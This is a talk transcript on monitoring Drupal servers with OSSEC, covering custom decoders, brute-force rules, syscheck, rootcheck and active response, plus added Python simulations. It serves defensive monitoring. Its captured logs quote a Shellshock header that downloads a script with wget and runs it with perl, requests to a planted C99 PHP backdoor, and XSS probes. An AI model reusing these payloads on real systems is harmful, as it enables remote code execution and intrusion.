OSSEC: intrusion detection and response system, and log analysis of Drupal sites and servers
- Kenneth Lee
2 Accidental surprises, November
[04/Nov/2012:05:48: ] "POST %2Fxss HTTP/1.1" "-" "-"
[04/Nov/2012:05:49: ] "POST q=ckeditor%2fxss HTTP/1.1" "-" "-"
[04/Nov/2012:05:49: ] "GET files/wtm5439n.php HTTP/1.1" "-" "-"
[04/Nov/2012:06:27: ] "POST default/files/wtm5439n.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.1"
C99 (R57) shell (PHP-based backdoor)
CKEditor: arbitrary code execution (SA-CONTRIB )
Core served .php files from the files dir (SA-CORE )
3 Last month's doozie
/var/log/syslog
Oct 20 19:58:18 example drupal: php Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (line 984 of /var/www/drupal/www/includes/database/database.inc)
4 Shellshock
/var/log/nginx/access.log
[18/Oct/2014:16:50: ] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" "() { :;}; /bin/bash -c \x5cx22cd /tmp;wget /tmp/lifesux.txt;rm -rf /tmp/lifesux.txt\x5cx22" "() { :;}; /bin/bash -c \x5cx22cd /tmp;wget lifesux.txt;perl /tmp/lifesux.txt;rm -rf lifesux.txt\x5cx22"
5 What's in logs? /var/log/apache2
crawlers hunting for holes
brute-forcing /user/password, /user/register
error 500, 504 (gateway timeouts, slow PHP?)
6 What's in logs? /var/log/syslog (Drupal)
brute forcing (in more detail)
exceptions, permissions problems
crashes, panics, timeouts
external service drama: Mollom, payment gateway
7 What's in logs? /var/log/auth.log
SSH, user/group modifications
sudo vi /srv/drupal/includes/bootstrap.inc :(
8 Risk =
Intrusion
Bad practice (sudo chown -R 777..)
Human error
Dependent services (third parties)
Packages installed or removed (/var/log/apt/history.log)
All have impact, all are in the logs
9 ISO 27001
Security is not just about intrusions
Security is anything that could compromise availability, integrity, confidence, trust, reputation, money
10 What to do about it? Enter OSSEC
11 OSSEC model
Server->agent mode (central config, active response propagates)
Local mode (standalone)
Hybrid mode (multi-tier, complex topology)
12 4 main features
Log analysis (what's happening now that's being logged?)
Syscheck (integrity checking: what happened that left traces?)
Rootcheck (rootkit detection)
Active response (what to do about it?)
13 Log Analysis: what's happening?
Decoders: how to interpret logs (regex patterns to split up timestamps, IPs, messages)
Rules: match the decoded message against known issues, and grade them by severity
14 Log Analysis: out-of-the-box examples
SSH (brute-forcing, first time a user logged in)
First time a user executed sudo
SMTP (spam relay attempts, SASL brute-forcing)
Apache/Nginx issues (40Xs, 50Xs)
WordPress/Joomla brute-forcing; no Drupal :(
15 Log Analysis: Drupal watchdog custom decoder (Syslog module)
<decoder name="drupal">
  <program_name>^drupal</program_name>
  <prematch>\d+.\d+.\d+.\d \S+ \d+ \w+ </prematch>
  <regex offset="after_prematch">(\d+.\d+.\d+.\d+)\ (\.+)\ \.*\ \d+\ \.*\ (\.+)</regex>
  <order>srcip,url,data</order>
</decoder>
16 Log Analysis: example Drupal rules 1/3
<rule id="104110" level="3">
  <decoded_as>drupal</decoded_as>   <!-- use the drupal decoder for this message -->
  <match>drupal</match>
  <description>drupal syslog message</description>
</rule>
17 Log Analysis: example Drupal rules 2/3
<rule id="104120" level="6">
  <if_sid>104110</if_sid>   <!-- if this was a Drupal log message -->
  <match>login attempt failed</match>   <!-- and the message contained "Login attempt failed" -->
  <description>drupal failed login</description>
</rule>
18 Log Analysis: example Drupal rules 3/3
<rule id="104130" level="10" frequency="4" timeframe="360">   <!-- happened too many times too quickly -->
  <if_matched_sid>104120</if_matched_sid>   <!-- parent Drupal rule: login attempt failed -->
  <description>possible Drupal brute force attack (high number of logins).</description>
</rule>
19 Log Analysis: Bingo
OSSEC HIDS Notification
Jun 23 18:11:38
Received From: (example) >/var/log/messages
Rule: fired (level 10) -> "Possible Drupal brute force attack (high number of logins)."
Portion of the log(s):
Jun 23 18:11:38 example drupal: user index.php?q=user/login 0 Login attempt failed for wembleylman10.
Jun 23 18:11:36 example drupal: user index.php?q=user/login 0 Login attempt failed for wembleylman10.
Jun 23 18:09:12 example drupal: user Login attempt failed for arrevemof.
Jun 23 18:09:12 example drupal: user Login attempt failed for arrevemof.
Jun 23 18:09:09 example drupal: user Login attempt failed for abralfultifug.
Jun 23 18:09:09 example drupal: user Login attempt failed for abralfultifug.
--END OF NOTIFICATION
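To make the decoder-then-rules flow concrete, here is an added simulation (my own example, not OSSEC code) of the three-rule chain above run over constructed syslog lines in the "Bingo" style; the log layout (srcip, request URI, uid, message after "drupal:") and the documentation-range IPs are assumptions, and the counter fires on exactly the 4th failed login inside 360 s, whereas OSSEC's own frequency counter is documented to need a couple more events than the literal value.

```python
"""Simulate the decoder + three-rule chain (104110 -> 104120 -> 104130)
over constructed Drupal syslog lines. Added example, not OSSEC code."""
import re
from datetime import datetime, timedelta

# Constructed log layout (an assumption, not the Syslog module's stock format):
#   "Mon DD HH:MM:SS <host> drupal: <srcip> <request_uri> <uid> <message>"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>\w+): (?P<rest>.*)$"
)
# Plays the role of the slide's <regex> with <order>srcip,url,data</order>
DRUPAL_RE = re.compile(
    r"^(?P<srcip>\d+\.\d+\.\d+\.\d+) (?P<url>\S+) (?P<uid>\d+) (?P<data>.+)$"
)


def decode(line, year=2014):
    """Return decoded fields for a 'drupal' syslog line, or None if the decoder did not match."""
    m = SYSLOG_RE.match(line)
    if not m or m.group("prog") != "drupal":     # <program_name>^drupal</program_name>
        return None
    d = DRUPAL_RE.match(m.group("rest"))
    if not d:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "decoder": "drupal", **d.groupdict()}


class DrupalRules:
    """Rules 104110 (any drupal message), 104120 (failed login) and 104130
    (4 matches of 104120 within 360 s; no <same_source_ip/>, so counted globally)."""

    FREQUENCY = 4
    TIMEFRAME = timedelta(seconds=360)

    def __init__(self):
        self.window = []   # timestamps of recent 104120 matches

    def evaluate(self, event):
        """Return (rule_id, level, description) for the most specific rule that fires."""
        if event is None or event["decoder"] != "drupal":
            return None
        fired = (104110, 3, "drupal syslog message")
        # The slide's <match>login attempt failed</match> fires on "Login attempt failed",
        # so compare case-insensitively.
        if "login attempt failed" not in event["data"].lower():
            return fired
        fired = (104120, 6, "drupal failed login")
        now = event["ts"]
        self.window = [t for t in self.window if now - t <= self.TIMEFRAME]
        self.window.append(now)
        if len(self.window) >= self.FREQUENCY:
            self.window.clear()   # start a fresh window after alerting (simulation choice)
            fired = (104130, 10, "possible Drupal brute force attack (high number of logins).")
        return fired


# Constructed sample modelled on the "Bingo" notification (IPs from documentation ranges)
SAMPLE_LOG = """\
Jun 23 18:09:09 example drupal: 198.51.100.7 index.php?q=user/login 0 Login attempt failed for abralfultifug.
Jun 23 18:09:12 example drupal: 198.51.100.7 index.php?q=user/login 0 Login attempt failed for arrevemof.
Jun 23 18:10:01 example drupal: 203.0.113.9 index.php?q=node/5 1 Session opened for admin.
Jun 23 18:11:36 example drupal: 198.51.100.7 index.php?q=user/login 0 Login attempt failed for wembleylman10.
Jun 23 18:11:38 example drupal: 198.51.100.7 index.php?q=user/login 0 Login attempt failed for wembleylman10.
Jun 23 18:30:00 example drupal: 203.0.113.9 index.php?q=user/login 0 Login attempt failed for admin.
Jun 23 18:30:05 example sshd: Accepted publickey for deploy from 203.0.113.9
"""


def run(log_text):
    """Feed each line through decoder and rules; return (time, rule_id, level, description) alerts."""
    rules = DrupalRules()
    alerts = []
    for line in log_text.splitlines():
        event = decode(line)
        fired = rules.evaluate(event)
        if fired:
            alerts.append((event["ts"].strftime("%b %d %H:%M:%S"), *fired))
    return alerts


if __name__ == "__main__":
    for when, rule_id, level, desc in run(SAMPLE_LOG):
        print(f"{when}  rule {rule_id} (level {level}) -> {desc}")
```

The sshd line never reaches the rules because the decoder's program_name check rejects it, which is exactly why a missing or mis-written decoder shows up as silence rather than as an error.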
20 Log Analysis: resource problems? (bottleneck/memory leak?)
OSSEC HIDS Notification
May 07 14:49:44
Received From: (example) >/var/log/syslog
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
May 7 14:49:43 example drupal: php PDOException: SQLSTATE[HY000]: General error: 1205 Lock wait timeout exceeded; try restarting transaction: DELETE FROM {XXXXXXXXX} #012WHERE (uid = :db_condition_placeholder_0) AND (subid = :db_condition_placeholder_1) ; Array#012(#012 [:db_condition_placeholder_0] => 68148#012 [:db_condition_placeholder_1] => 77217#012)#012 in XXXXXXX_update::delete() (line 652 of /var/www/drupal/www/sites/all/modules/custom/xxxxxx/xxxxx.inc).
--END OF NOTIFICATION
OSSEC HIDS Notification
Jun 14 15:17:02
Received From: (example) >/var/log/messages
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
Jun 14 15:17:02 example ool www: PHP Fatal error: Allowed memory size of bytes exhausted (tried to allocate 64 bytes) in /var/www/drupal/www/sites/all/modules/contrib/views/modules/field/views_handler_field_field.inc on line
--END OF NOTIFICATION
21 Syscheck
Detects when files have changed (checksums); lots of false positives due to software patching
2014 Jul 01 04:01:03
Received From: (example) >syscheck
Rule: 550 fired (level 7) -> "Integrity checksum changed."
Portion of the log(s):
Integrity checksum changed for: '/usr/bin/ssh'   << hopefully that's legit because you recently patched OpenSSH..
Size changed from '434024' to '641640'
Old md5sum was: ' f654d7a2d7b38a0b0c09def4'
New md5sum is : 'a8bf35316eb4f46e377a957ecb6cfdca'
Old sha1sum was: '976af6f53338a7e9d4eb71617a2a8471aeb6937b'
New sha1sum is : 'e871e0a907cdfb76c6e0722a6196b0c9f8edb1fd'
--END OF NOTIFICATION
What's changed?
22 Rootcheck
rkhunter is great, but get a 2nd opinion; hopefully more false positives than not
OSSEC HIDS Notification
Nov 20 23:37:22
Received From: (example) >rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):
Anomaly detected in file '/tmp/#sql_1020_0.myi'. Hidden from stats, but showing up on readdir. Possible kernel level rootkit."
--END OF NOTIFICATION
23 Rootcheck: Gah
OSSEC HIDS Notification
Nov 12 09:36:16
Received From: example->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):
File /var/www/sites/default/settings.php is owned by root and has written permissions to anyone."
--END OF NOTIFICATION
24 Active Response: OK, now what?
OSSEC HIDS Notification
Jun 28 21:36:54
Received From: (example) >/var/log/nginx/access.log
Rule: fired (level 10) -> "Multiple web server 400 error codes from same source ip."
Portion of the log(s):
[28/Jun/2014:21:34: ] "GET //phpmyadmin all-languages/scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin /scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //php/phpmyadmin/scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //forum/phpmyadmin/scripts/setup.php HTTP/1.1" "-" "-"
[28/Jun/2014:21:34: ] "GET //cpphpmyadmin/scripts/setup.php HTTP/1.1" "-" "-"
--END OF NOTIFICATION
25 Active Response
firewall-drop.sh: the most common response, but it can be anything you want
A null-route alternative exists for systems behind NAT (where public IP blocking is useless)
26 Active Response: when using the server->agent model
One agent detects
Every agent blocks (immediately)
Can employ repeat offender punishment
27 Active Response: Drupal behind load balancers/Varnish?
Make sure you have IPs logging correctly
Nginx/Apache to log X-Forwarded-For as client IP
$conf['reverse_proxy']
$conf['reverse_proxy_addresses']
28 sucks
Good for notifications. Crap to look at. (ELK demo time)
29 ELK: much nicer (demo time)
30 Mig's tips
Filter out the noise to avoid monitoring fatigue: tune, don't ignore rule 1002 ("Unknown Problem")
Whitelist all your IPs: don't lock yourself out
OSSEC is not perfect: add defense in depth (NIDS, Cloudflare WAF, rkhunter, ClamAV)
31 Resources
These slides
Website
Monitoring Drupal with OSSEC
My quick-start install script
Longer version of this talk
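The active-response slides (repeat offender punishment, proxy addresses that must not be treated as clients) and the "whitelist all your IPs" tip above share one decision logic; this added simulation (my own example, not OSSEC's scripts) models it: a level threshold, a CIDR whitelist covering the load balancer, and escalating block durations. The option names echo OSSEC's white_list, level and repeated_offenders settings, but the escalation arithmetic, the IPs and the timeouts here are this example's own assumptions.

```python
"""Simulated OSSEC-style active response: block only above a level, never block a
whitelisted address (yourself, the reverse proxy), escalate on repeat offenders.
Added example, not OSSEC code."""
import ipaddress
from datetime import datetime, timedelta


class ActiveResponse:
    """Decide whether an alert triggers a firewall drop and for how long."""

    def __init__(self, whitelist, min_level=10, timeout_min=10,
                 repeated_offenders=(30, 60, 120)):
        # Assumed semantics: first block lasts timeout_min, later blocks use the
        # repeated_offenders list in order, sticking at its last value.
        self.whitelist = [ipaddress.ip_network(n) for n in whitelist]
        self.min_level = min_level
        self.timeout = timedelta(minutes=timeout_min)
        self.escalation = [timedelta(minutes=m) for m in repeated_offenders]
        self.offences = {}        # srcip -> number of blocks already issued
        self.blocked_until = {}   # srcip -> expiry of the current block

    def is_whitelisted(self, srcip):
        ip = ipaddress.ip_address(srcip)
        return any(ip in net for net in self.whitelist)

    def on_alert(self, srcip, level, now):
        """Return ("block", expiry) or ("skip", reason)."""
        if level < self.min_level:
            return ("skip", "level below threshold")
        if self.is_whitelisted(srcip):
            return ("skip", "whitelisted")
        if self.blocked_until.get(srcip, now) > now:
            return ("skip", "already blocked")
        n = self.offences.get(srcip, 0)
        if n == 0:
            duration = self.timeout
        else:
            duration = self.escalation[min(n - 1, len(self.escalation) - 1)]
        self.offences[srcip] = n + 1
        self.blocked_until[srcip] = now + duration
        return ("block", now + duration)


def demo():
    """Constructed scenario: office IP and load-balancer range whitelisted (documentation ranges)."""
    ar = ActiveResponse(whitelist=["203.0.113.10/32", "10.0.0.0/8"])
    t0 = datetime(2014, 6, 28, 21, 34)
    return [
        ar.on_alert("198.51.100.7", 10, t0),                           # first block: 10 min
        ar.on_alert("198.51.100.7", 10, t0 + timedelta(minutes=2)),    # still blocked: skip
        ar.on_alert("198.51.100.7", 10, t0 + timedelta(minutes=15)),   # 2nd offence: 30 min
        ar.on_alert("10.0.0.5", 10, t0),                               # the load balancer: skip
        ar.on_alert("192.0.2.4", 6, t0),                               # level 6: skip
    ]


if __name__ == "__main__":
    for action, detail in demo():
        print(action, detail)
```

If the web server logs the proxy's address instead of X-Forwarded-For, every alert carries the 10.0.0.5 address and the whitelist is the only thing standing between you and blocking your own load balancer on every agent.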
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationn Learn about the Security+ exam n Learn basic terminology and the basic approaches n Implement security configuration parameters on network
Always Remember Chapter #1: Network Device Configuration There is no 100 percent secure system, and there is nothing that is foolproof! 2 Outline Learn about the Security+ exam Learn basic terminology
More informationContents. Is Rumpus Secure? 2. Use Care When Creating User Accounts 2. Managing Passwords 3. Watch Out For Symbolic Links 4. Deploy A Firewall 5
Contents Is Rumpus Secure? 2 Use Care When Creating User Accounts 2 Managing Passwords 3 Watch Out For Symbolic Links 4 Deploy A Firewall 5 Minimize Running Applications And Processes 5 Manage Physical
More informationHoneynet Weekly Report Canadian Institute for Cybersecurity (CIC)
Report (11) Captured from 04-05-2018 to 18-05-2018 1-Introduction The first honeypot studies released by Clifford Stoll in 1990, and from April 2008 the Canadian Honeynet chapter was founded at the University
More informationProtection and Security
Protection and Security Security: policy for controlling access to system Protection: mechanism implementing security policy Why: users can do bad things to system either maliciously or unintentionally
More informationPractical Magic with SSH. By David F. Skoll Roaring Penguin Software Inc. 1 February
Practical Magic with SSH By David F. Skoll Roaring Penguin Software Inc. 1 February 2001 http://www.roaringpenguin.com dfs@roaringpenguin.com Overview of Presentation Why SSH? Problems with Telnet & Friends
More informationControl Center Release Notes
Control Center Notes 1.5.1 Zenoss, Inc. www.zenoss.com Control Center Notes Copyright 2018 Zenoss, Inc. All rights reserved. Zenoss, Own IT, and the Zenoss logo are trademarks or registered trademarks
More informationFighting bad guys with an IPS from scratch
Fighting bad guys with an IPS from scratch Daniel Conde Rodríguez BS Computer Engineer PCAE - LFCS Webhosting Service Operations Team Coordinator Acens (Telefónica) @daconde2 www.linkedin.com/in/daniconde
More informationIntrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng
Intrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng 1 Internet Security Mechanisms Prevent: Firewall, IPsec, SSL Detect: Intrusion Detection Survive/ Response:
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationBIG-IP Application Security Manager : Implementations. Version 13.0
BIG-IP Application Security Manager : Implementations Version 13.0 Table of Contents Table of Contents Preventing DoS Attacks on Applications... 13 What is a DoS attack?...13 About recognizing DoS attacks...
More informationFive Code RED Security Threats to Windows Servers How to Detect them The Importance of Consolidation, Detection Enterprise Security Series
Five Code RED Security Threats to Windows Servers How to Detect them The Importance of Consolidation, Detection Enterprise Security Series Abstract How important is it for your organization to stop an
More information